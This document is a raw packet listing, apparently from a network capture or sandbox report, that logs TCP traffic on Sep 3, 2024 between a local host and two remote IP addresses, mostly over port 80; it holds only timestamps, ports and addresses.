Sep 3, 2024 17:13:08.588963032 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.588963985 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.588974953 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.588995934 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.589015961 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.594357967 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:08.628303051 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.628324032 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.628335953 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.628401995 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.628421068 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.629367113 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.629378080 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.629389048 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.629400969 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.629407883 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.629434109 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.629462957 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.629607916 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.629620075 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.629631042 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.629642963 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.629653931 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.629661083 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.629683018 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.629697084 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.630393982 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.630404949 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.630415916 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.630428076 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.630439043 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.630450010 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.630450010 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.630462885 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.630480051 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.630503893 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.634165049 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.634183884 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.634202003 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.634218931 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.634248018 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.634376049 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.634387970 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.634401083 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.634412050 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.634423971 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.634572983 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.638139963 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:08.642244101 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642256975 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642267942 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642307043 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.642333984 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.642513990 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642524004 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642534971 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642545938 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642564058 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642565012 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.642576933 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642586946 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642592907 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.642616987 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.642622948 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642633915 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642644882 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642646074 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.642668962 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.642694950 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.642746925 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642801046 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.642827988 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642839909 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.642877102 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643208027 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643219948 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643227100 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643243074 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643260002 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643270969 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643275023 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643285036 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643295050 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643297911 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643311977 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643347025 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643405914 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643423080 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643436909 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643448114 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643451929 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643461943 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643475056 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643482924 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643515110 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643645048 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643656015 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643666983 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643678904 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643691063 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643695116 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643702984 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643719912 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643728971 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643762112 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643776894 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643825054 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643861055 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643872976 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643882990 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643894911 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643913031 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643929005 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643939972 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.643940926 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643970966 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.643996954 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.644161940 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.644172907 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.644182920 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.644196033 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.644206047 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.644216061 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.644220114 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.644228935 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.644241095 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.644248009 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.644273996 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.644284010 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.682348967 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.682399035 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.682409048 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.682491064 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.682501078 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.682511091 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.682523012 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.682533026 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.682534933 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.682583094 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.682727098 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.682738066 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.682749033 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.682761908 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.682780981 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.682807922 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.682919979 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.682931900 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.682980061 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.683046103 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683057070 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683068037 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683078051 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683089018 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683099985 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683099985 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.683110952 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683134079 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.683161020 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.683355093 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683365107 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683374882 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683381081 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683391094 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683403015 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683407068 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.683420897 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683434010 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.683463097 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.683742046 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683753967 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683768034 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683779955 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683790922 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683796883 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.683801889 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.683821917 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.683845043 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.684112072 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.684123039 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.684132099 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.684143066 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.684153080 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.684164047 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.684169054 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.684171915 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.684180021 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.684192896 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.684195995 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.684221983 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.684221983 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.684271097 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.725558996 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.725611925 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.725622892 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.725640059 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.725651026 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.725653887 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.725670099 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.725683928 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.725702047 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.725713968 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.725720882 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.725742102 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.725759029 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.725824118 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.725868940 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.725889921 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.725902081 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.725950956 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.725984097 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.725995064 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.726006031 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.726018906 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.726028919 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.726031065 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.726067066 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.730627060 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.730638981 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.730652094 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.730669975 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.730683088 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.730683088 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.730694056 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.730700970 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.730709076 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.730736017 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.730777025 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.738521099 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.738589048 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.738600016 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.738606930 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.738629103 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.738662004 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.738729954 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.738748074 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.738759995 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.738770962 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.738789082 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.738797903 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.738804102 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.738845110 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.738868952 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.738872051 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.738918066 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.738970041 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.738981009 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739015102 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.739032030 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739043951 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739053965 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739079952 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.739120007 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.739154100 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739164114 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739201069 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.739223003 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.739490032 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739545107 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.739552975 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739566088 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739602089 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.739623070 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.739636898 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739648104 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739696980 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.739721060 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739733934 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739774942 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.739860058 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739872932 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739882946 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739895105 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.739937067 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.739937067 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.740009069 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740020990 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740113974 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.740155935 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740166903 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740176916 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740187883 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740200043 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740211010 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740222931 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740231991 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.740246058 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.740268946 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.740453959 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740469933 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740479946 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740499020 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740510941 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740520000 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.740550995 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.740686893 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740699053 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740710020 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740731001 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740734100 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.740760088 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.740778923 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.740902901 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740914106 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740923882 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740935087 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740947008 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740956068 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.740959883 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740972996 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740983009 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.740991116 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.741010904 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.741023064 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.784509897 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.784552097 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.784563065 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.784579039 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.784594059 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.784621000 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.784656048 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.784666061 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.784677982 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.784689903 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.784691095 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.784713030 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.784744978 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.784888029 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.784955978 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.784961939 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.784979105 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.784990072 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.785000086 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.785012007 CEST	80	49713	185.215.113.16	192.168.2.8
